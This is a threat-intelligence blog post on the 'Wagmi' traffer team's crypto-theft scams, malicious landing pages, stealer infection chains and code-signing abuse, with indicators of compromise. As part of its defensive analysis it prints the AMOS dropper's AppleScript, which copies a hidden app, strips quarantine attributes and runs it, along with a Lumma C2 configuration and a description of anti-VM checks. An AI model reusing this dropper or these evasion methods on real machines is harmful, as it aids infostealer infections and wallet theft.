· 27 min read

The Wagmi Manual: Copy, Paste, and Profit

First promoted as the “Triple Culture” Team and later rebranded as the Wagmi Team, this traffer group has been operating since at least, early 2023. One...

The Wagmi Manual: Copy, Paste, and Profit

This blog is written in collaboration with @g0njxa. Our goal is to raise awareness, as we have seen many people fall for these scams across X, Discord, and other social media platforms, generating significant profits for threat actors.

Case Study

First promoted as the “Triple Culture” Team and later rebranded as the Wagmi Team, this traffer group has been operating since at least, early 2023. One of their initial advertisement posts was made on Nulled, which was later seized by law enforcement.

The group specializes in NFT scams and boasts over two years of experience. They offer MacOS and Windows stealers that are crypted with the “unique” crypter. Their operation includes callers, guides, and mentorship from members. They also claim to have high-quality phishing pages and continuously make developments.

Just to see how much profit Wagmi makes from the operations, we have attached the graph below for your reference. Each username represents an individual.

The alleged total earning of this group is, at least, $2,413,829 between the first log record on June 6th, 2023 until March 2nd,2025.

As observed on the Wagmi channels, the source of this profit is linked to victim logs and is often described as coming from “brute-forcing password wallets”, “cold wallets (Ledger, Trezor)”, or “NFT-selling”. The most common method of compromising cold wallets involves deploying seed phrase phishing, which aims to trick users into revealing their seed phrase on infected machines. However, these techniques don’t always succeed, and the potential amount of cryptocurrency that could have been stolen is likely higher than what is discussed in this section.

Within the Wagmi Team, wallets with balances lower than approximately $300 are considered unimportant, and the administration typically makes no effort to brute-force their passwords to drain the assets. Instead, the information from these wallets is likely passed on to the workers associated with the victim’s log for their own processing. As such, the potential profit from these wallets is not reflected in the charts discussed in this section.

Wagmi Operation

Similar to CryptoLove, Wagmi leverages NFT marketplaces to target victims, including OpenSea, Magic Eden, and Getgems. The threat actor selects profiles with a floor price of approximately $500 or more — the floor price being the lowest price at which a specific NFT can be purchased. They then join the corresponding Discord server, identify members, and attempt to lure them into installing the malicious application via X or Discord.

According to the group lead, accounts without their X profiles listed on Discord are preferable because they are less likely to have been targeted by spam.

The work on the Wagmi traffer team is very simple and usually involves newcomers into the traffer ecosystem. The group has a short “manual” on how to initiate conversations with potential victims. They typically approach them with enticing job offers, presenting various positions that seem appealing, which is the most basic and common scam practice by traffers.

Please note that most of the content shown in the manual was stolen from other manuals in bigger traffer teams such as Crazy Evil.

Dialogs with victims are also supplemented with fake guidance manuals given to the individuals being scammed, trying to gain their trust.

Users from social media platforms like X, particularly those involved in the Web3 community, sometimes publicly share their cryptocurrency wallet addresses — for example, to receive token airdrops. This behavior can unintentionally link individuals to the assets they hold. Such information is highly valuable to traffers, who use it to identify potential victims.

Following trends observed within the traffer scam community, the Wagmi team has developed an automated scraper and parser that collects cryptocurrency wallet addresses posted on Twitter (X) to help identify these potential victims.

The tool is maintained and operated by the administration, and the scraped information is provided to new workers to support their scam operations.

The Wagmi traffer group is managed by @DanbiWoo, with @scarletexe taking on a support role.

An example of the worker account is shown below.

The scam websites created by the Wagmi team are less sophisticated compared to those from other scam projects observed in different Traffer teams. Wagmi specializes in promoting fake web3-themed games that are, in fact, impersonations of other real games projects, but under a new name. The Wagmi team also tries to incorporate fake meeting software projects into their scam operations, which is a common topic in the traffer ecosystem. Like on the fake games, the fraudulent meeting software websites lack originality and closely mimic those from other Traffer teams, such as Marko Polo.

This is reinforced by the fact that some websites used by Wagmi had references to the original websites from where the content theme was stolen.

And, of course, similar-looking designs with exact text matching, as mentioned before.

Despite having non-sophisticated scam projects, Wagmi poses a threat to the internet community, and its workers have made possible the stealing of millions in cryptocurrencies from victims.

When new users are accepted into the group work, they are offered different scam projects (landings) to work with. Let’s look at them.

Splare

The Splare Call app claims to be a video meeting software “ideal for companies or people who value privacy”.

The website above is a clone of Vixcall/Voxium/Vorium, which are known fake meeting software platforms previously used by cybercriminal groups in their social engineering campaigns.

The user is prompted to use an “access code” to download the Splare Call App. This code is generated on the Wagmi Telegram Bot, where every worker is given a unique code. This code is shared with victims to download malicious builds and avoid leaks to researchers. Windows and MacOS applications are delivered based on the victim’s User-Agent.

Victims from the website above are tracked in the log channel by the marker or build ID “SPL” as shown below.

Showdown game

The Showdown game claims to be a “free-to-play battle royale game”.

In fact, this website impersonates a mobile game named “Takedown Legends”.

When a user tries to download from the website, it is prompted with a selection of operating system and required to validate an access code (generated on the Wagmi Code Telegram bot) to generate a download link, a common behavior in all the Wagmi websites.

Victims from this website are tracked in the log channel by the build ID “SWD” as shown below.

Tokyo Ronins

The screenshot below is the Wagmi landing page that is copied from a legitimate mobile game named “Tokio Beast”.

Victims from the landing page above are tracked under the Build ID “TR” as shown below.

Strike Force

This landing page advertises a purported online soccer survival match game. In reality, it’s merely a clone of the legitimate mobile game “UNKJD Soccer” with no actual functionality.

Strike League

Similar to Strike Force, another website has been in use by the Wagmi Team in recent days. The design is a copy of their Strike Force website.

Users are also prompted with the same banners than in the Strike Force website.

Victims from both websites are tracked on the log channel under the Build IDs ”STF” on Strike Force and ”STL” for Strike League as shown below.

Rocket Rumble

There is another landing related to Wagmi named “Rocket Rumble”, which is another copy of the website of another mobile game named “Blast Royale”.

All of the API subdomains were built using the same template as the Sleipnir DAO Browser, one of the oldest landing pages used by the traffer team.

The original website is still operational, but is sharing old builds. These subdomains are also delivering the same malware payloads for both Windows and MacOS.

The Sleipnir browser website is still promoting an abandoned scam project by the Wagmi Team, the “Battle Ultimate game”, at the website battleultimate[.]xyz.

In recent months, unusual activity has been detected that uses the same infrastructure as the traffer scam websites discussed in this blog but is not directly related to these scams.

In December 2024, a malware campaign impersonating PocketUniverseZ Chrome Extension and being promoted via Youtube Ads was reported on X. We can still find, at the time of writing this report, a live (but with downloads disabled) example of this campaign at pocketuniverses[.]org.

Hosting the fake Google Chrome Store at web-storechrome[.]com/detail/pocket-universe/gacgndbocaddlemdiaadajmlggabdeod. Further pivoting, we found a sandbox sample, which suggests that it delivers the similar payloads described in this blog.

Please note that the web-storechrome[.]com website is hosted at 186.2.175[.]33, which we will call “Host B” for further analysis.

As mentioned before, all Windows builds being delivered by Wagmi Traffer team websites are using a common API path under the pattern: //api/download//win

The malicious builds shared on the fake PocketUniverseZ websites were using this delivery method through the SleipnirDAO browser website, as we can see below.

The same code snippet could be found at that time, for example, in the source code of the Wagmi fake game “Battle Ultimate” previously mentioned.

At the time of this report, the download path for the observed PocketUniverseZ Malware Campaign is still present but non-functional, as confirmed by the API response.

In the logs channel, around the time when some of these fake PocketUniverseZ websites appeared, we found references to build IDs such as “pu” (likely stands for PocketUniverse), which lends credibility to our claims.

More alternative activity can be associated with this traffer team by looking at 185.149.120.235, which we will call “Host A”, and is currently the main host for all the Wagmi traffer scan projects websites since at least May 2024.

The domain currentsyb[.]com is recently being hosted at “Host A”. This domain is redirecting to a video link involved in a malicious YouTube Ads campaign promoting a Phantom wallet drainer. This campaign has been reported on X here and here.

This campaign is luring people into running a malicious script in the browser console as a fake Jupiter Exchange exploit. To further verify our claims, the script is hosted in the domain gitproduction[.]com, which resolves to “Host B” — 186.2.175[.]33, previously reported and involved in the fake PocketUniverseZ campaign and linked to Wagmi Traffer Team.

Looking further into the malicious script, we can see the code is a wallet drainer specifically targeting Phantom wallet (Solana blockchain). After connecting to the victim’s wallet, it sends the stolen wallet data to the endpoint solapi[.]network. We can also see a reference to the directory D:\Скаммеры (which translates to “Scammers”) and the project folder “jup_bug_drain”, as well as the username “m4rce” and computer name “LAPTOP-9LDGB7NE” belonging to the threat actor.

While writing this blog, a more recent example of the odd activity performed by Wagmi was spotted. Wagmi decided to create a landing page delivering its Windows and MacOS stealer builds, disguised as an “AI Crypto Trading Bot” and promoting it via X Ads.

Apart from sharing the same AMOS dropper for MacOS and the same C2 servers for builds as the landings of the team, the landing page is hosted in “Host A”, as previously mentioned.

Another malicious landing page also appeared to be hosted in “Host A”, although the download functionality remains disabled, and its usage in the wild remains unknown to us.

While these are just a few recent examples of activity related to the infrastructure of the Wagmi Traffer Team, there should be more relevant historical activity as “Host B” has hosted multiple drainer websites and other scam-related content, including, for example, Remix landing pages, used in scams as described here.

At some point, the Wagmi traffic team used several Zoom impersonation pages as “Host A” was hosting them, and logs with build ID “zm” appeared in the log channel. This is a more common activity present in traffer teams where the workers of these teams try to schedule a meeting with the victims and make them download a malicious build disguised as a Zoom Launcher.

The threat actors behind the Wagmi Traffer team pose a significant threat to the web3 community and cryptocurrency users in general, not only for setting up an organized team of people willing to target individuals with their scam projects but also for trying to target people with other creative ideas as the ones we discussed in this section.

Upon the payload execution, the infection chain begins with a HijackLoader being injected into “more.com”, which led to the execution of tcpvcon.exe that’s dropped in the %TEMP%\21415 directory. Finally, this leads to the deployment of the LummaC2 infostealer as the final payload.

Observed Lumma configuration:

  "build_info": {
    "user_id": "xMnLq7",
    "build_id": "SPL"
  },
  "c2_domains": [
    "pencilfight.]click",
    "uncertainyelemz.]bet",
    "hobbyedsmoker.]live",
    "presentymusse.]world",
    "deaddereaste.]today",
    "subawhipnator.]life",
    "privileggoe.]live",
    "boltetuurked.]digital"
  ]
}

The Splare payload (c18a81864bf98ca0c4ec181a88750d27591cb7ff842ccb926da16d948ca07df0) analyzed was leveraging HijackLoader to deliver Rhadamanthys stealer. HijackLoader has numerous VM checks implemented. In vm_calc_cpu_cycles(), the function implements a timing technique to detect virtualization by measuring the execution duration of the CPUID instruction. It runs a loop 100 times, using the RDTSC instruction to capture CPU timestamps before and after executing CPUID. During each iteration, it calculates the time difference and adds it to a running total. The consistent timing differences occur because hypervisors must trap and emulate privileged instructions like CPUID, introducing measurable overhead compared to bare-metal execution. After collecting 100 samples, the function calculates the average execution time, which serves as an indicator of virtualization.

The vm_check_if_hypervisor_present() function uses a direct approach by executing CPUID with EAX=1 and examining bit 31 of the ECX register. This bit is specifically designed by Intel to indicate hypervisor presence and is a standard mechanism for guest operating systems to detect when they’re running in a virtualized environment.

The vm_cpuid_check() function executes CPUID with EAX=0x40000000, which is the hypervisor leaf, and then checks if the returned EAX value is greater than or equal to 0x40000000 to determine if a hypervisor is present.

The mw_vm_additional_checks consists of username and computer name checks (checking if it’s numeric only) as well as the check if the executable is running from the user’s desktop.

The AntiVM module was also reported by Zscaler.

The most recent sample (1a5bf23e14f7432202546093a0e025ddacebec0458ff21c137bd2cd69b9efde4) is packed with a Delphi-based packer, which also contains a set of anti-VM functionalities.

The function in the screenshot below has two primary detection methods. The first approach checks for VMware’s I/O port by looking for the “VMXh” magic signature (0x564D5868), which is a standard identifier for VMware’s hypervisor communication channel. When this signature is detected, the code further identifies the specific VMware product (Express, ESX, GSX, Workstation, or generic VMware) and passes appropriate string identifiers to the VM handler function.

As a secondary detection mechanism, the code uses the CPUID instruction with hypervisor leaf 0x40000000 to detect VMware’s presence through its vendor ID string. This approach checks for “VMware” across three 32-bit values using little-endian encoding (0x61774D56 = “VMwa”, 0x4D566572 = “reVM”, 0x65726177 = “ware”).

Other than VMWare, the payload also checks for the presence of Sandboxie and VirtualBox.

For MacOS, Wagmi deploys an AMOS stealer. We wrote a configuration extractor that you can access here as well as the Yara rule.

Upon executing the MacOS initial payload, the following script is run (base64-encoded):

#!/bin/bash
osascript -e 'on run
    try
        set diskList to list disks
    end try
    try
        repeat with disk in diskList
            if disk contains "StolcAI" then
                set targetDisk to disk
                exit repeat
            end if
        end repeat
    end try
    if targetDisk is "" then
        return
    end if
    set folderPath to "/Volumes/" & targetDisk & "/"
    set appName to ".StolcAI"
    set appPath to folderPath & appName
    set tempAppPath to "/tmp/" & appName
    try
        do shell script "rm -f " & quoted form of tempAppPath
    end try
    try
        do shell script "cp " & quoted form of appPath & " " & quoted form of tempAppPath
    end try
    try
        do shell script "xattr -c " & quoted form of tempAppPath
    end try
    try
        do shell script "chmod +x " & quoted form of tempAppPath
    end try
    try
        do shell script quoted form of tempAppPath
    end try
end run'

The decoded AppleScript above scans all mounted disks for a volume containing the name “StolcAI”. If found, it constructs a file path to a hidden application named .StolcAI on that volume, copies it to the /tmp directory, removes its extended attributes (likely to bypass macOS quarantine or Gatekeeper protections), marks it as executable, and finally runs it.

Code signing certificate abuse

Code signing certificate abuse is prevalent among criminal groups. These actors purchase legitimate certificates to sign their malware, effectively bypassing Windows SmartScreen alerts, reducing UAC prompts, and achieving low detection rates. This tactic creates a false sense of security for victims, significantly increasing infection success rates.

Wagmi consistently leverages this strategy to maintain clean malware builds.

At the time of this analysis, their older Windows payloads were signed with a GlobalSign GCC R45 EV CodeSigning CA 2020 certificate (serial number: 2da0f80711e5c40d36e8eef7) issued to a Vietnamese cosmetics company. This signature has since been successfully revoked.

Following the revocation, Wagmi shifted tactics and began signing new builds with another GlobalSign GCC R45 EV CodeSigning CA 2020 certificate (serial number: 19544e115f316c4b2f288a54). This certificate, issued to an Indian real estate company, has also been successfully revoked.

Within days of transitioning from Lumma to Rhadamanthys, Wagmi resumed their certificate abuse tactics. Their new payloads were signed with yet another GlobalSign GCC R45 EV CodeSigning CA 2020 certificate (serial number: 332985d1583aa93bf6df0ffd) issued to a different Vietnamese company. This signature was promptly revoked.

Within days, Wagmi deployed a new certificate on their payloads. This time, they used another GlobalSign GCC R45 EV CodeSigning CA 2020 certificate (serial number: 5cf47c5f8a6b09ad2c71eeb9) issued to an Indian non-governmental organization. Like the previous certificates, this signature was also revoked.

Revoking certificates used in these malicious builds has proven effective not only in disrupting operations (as SmartScreen begins flagging the previously trusted executables) but also in imposing financial and operational costs on the threat actors. This protective measure helps shield potential victims from infection. We remain committed to monitoring and revoking certificates from these signed malware payloads.

Summarization of Victims

From June 6, 2023, to April 2, 2025, this campaign has affected 2,422 victims. It’s important to note that this figure only includes victims directly linked to the landing pages documented in the Telegram log channel. The total victim count is potentially much higher, as these statistics don’t account for victims from the threat actor’s separate infostealer operations that occurred outside the tracked campaign infrastructure.

Indicators of Compromise

Grouping landing domains by ID:

185.149.120[.]235 #Host A
186.2.175[.]33 #Host B
SPL 
splare[.]app
splare[.]xyz
splare[.]cc
splare[.]io
splarecall[.]cc
splarecall[.]com
splarecall[.]xyz

SWD
playswd[.]xyz
playshowdown[.]xyz
showdowngame[.]io
swdgame[.]xyz
playswdbtc.xyz

STL 
strikeleague[.]xyz
strikeleaguenft[.]xyz

STF 
strikeforcegame[.]xyz
playstrikeforcenow[.]com

RT
rocketrumble[.]xyz
playrocketrumble[.]xyz
rocketrumblesol[.]xyz

GRS 
gunrush[.]xyz
gunrushgame[.]xyz
playgunrush[.]xyz
playgunrushnow[.]xyz

RVS 
roboversegame[.]xyz
playrobovrs[.]xyz
playroboverse[.]xyz

RLC 
rocketlegacy[.]xyz
rocketlegacy[.]io
rocketlegacygame[.]com
playrocketlegacy[.]xyz
rocketlegacy[.]net 

AL / RL
animaliagame[.]xyz
playanimalia[.]xyz
animaliagame[.]net
animalia-game[.]xyz
roarland[.]xyz
roarland[.]io
roarlandplay[.]xyz
playroarland[.]xyz
roarland[.]org 

APE 
apestars[.]io
aperoyale[.]net 
aperoyaleplay[.]com 
aperoyaleplay[.]io 
playapestars[.]com 
apestarshq[.]xyz 
apestarshq[.]com 
apestarshq[.]org 
apestarshq[.]io 
apestarshq[.]net

JGL
junglelegends[.]io 
jungle-legends[.]io 
junglelegends[.]xyz 
jungle-legends[.]com

ULT / BTF
ultimateplay[.]xyz  
ultimategame[.]xyz 
playultimate[.]xyz 
myultimate[.]xyz 
battleultimate[.]xyz 
mybattleforge[.]xyz 
playbattleforge[.]org
playbattleforge[.]xyz
battleforge[.]cc

ZM
us002webzoom[.]us  
us003webzoom[.]us  
us004web-zoom[.]us  
us005web-zoom[.]us  
us006web-zoom[.]us  
us007web-zoom[.]us 
us008web-zoom[.]us  
us01web-zoom[.]us  
us050web-zoom[.]us  
us05webs-zoom[.]pw  
us08web-zoom[.]us  
us09web-zoom[.]us  
zoom[.]us50web[.]xyz

Sleipnir
Sleipnirbrowser[.]xyz
sleipnirbrowser[.]org

Burts Royale – 2023
Burstroyale[.]com

Callback
campfire-call[.]app

Malware 
astriia[.]com
gamehosting[.]shop/api
kosmosgrid[.]com/macshare.php
asoonworld[.]com/macshare.php

MacOS samples:
154af50ab1f4b14e10b2532574c3856bbdadaabb042ade5bf39a7153cb9e89f8
75ba94534ea1433f70c57de43b27b9dc1c9f310e004fa5c70ad3e6b79650328a
9f4e52d4dfb7ebf09e0371a92280ad21519030f7032077cba125903454dd211d
d516515e923875ae22b6325bba9e53f5fa531aa7c6c7a386fb380f3ae92b5009
2005bd6b7613d7c6bc8ea6e179f498b05feb185237511eebce44a5d3d87662ec
1ae7cdd81585233bfb3871385c67dd7fb43bfb2231ab2af5aded08d49c490f16

Windows samples:
38eff554ddee7664cd8b1c003ddf96f7ebe608acbe236b74e9045fd831a0c100
1d879fb13ed76a9892d8e9ea99aa6817cd1248d409956c1ab1b47c2f79c103bd
ecdd79c3228b8f354e6c0148c00038790bd8a874428dc9b3f57111e753d3565f
42735792cc7e76b7439751d4aa673d5bd61d100f8d4de42c9084db46e2a1dbf1
e0e0b3d2890053cbdf84d6c3177e267d8f767f4b2b6d6e5fb2de5860b0a09ee2

Malware C2s:
hxxp://85.209.128[.]59/contact
pencilfight.]click
uncertainyelemz.]bet
hobbyedsmoker.]live
presentymusse.]world
deaddereaste.]today
subawhipnator.]life
privileggoe.]live
boltetuurked.]digital

References

https://x.com/g0njxa/status/1843238051201618290
https://tria.ge/240829-3h687swhpf
https://x.com/realScamSniffer/status/1892010617890013239
https://x.com/g0njxa/status/1891990538724724984
https://medium.com/remix-ide/remix-in-youtube-crypto-scams-71c338da32d
https://learn.microsoft.com/en-us/virtualization/hyper-v-on-windows/tlfs/feature-discovery
https://www.zscaler.com/blogs/security-research/analyzing-new-hijackloader-evasion-tactics
https://github.com/RussianPanda95/IDAPython/tree/main/Atomic Stealer
https://ipinfo.io/tools/summarize-ips/eac434e6-b6b0-
https://github.com/RussianPanda95/Yara-Rules/blob/main/AMOS/win_mal_amos_stealer.yar

Next Post

Advancing Through the Cyberfront, LegionLoader Commander

Advancing Through the Cyberfront, LegionLoader Commander

Start the conversation

Zero spam. Unsubscribe anytime.

--email

By subscribing you agree that we process your data to send you our newsletter. No third parties, no ads. Ever.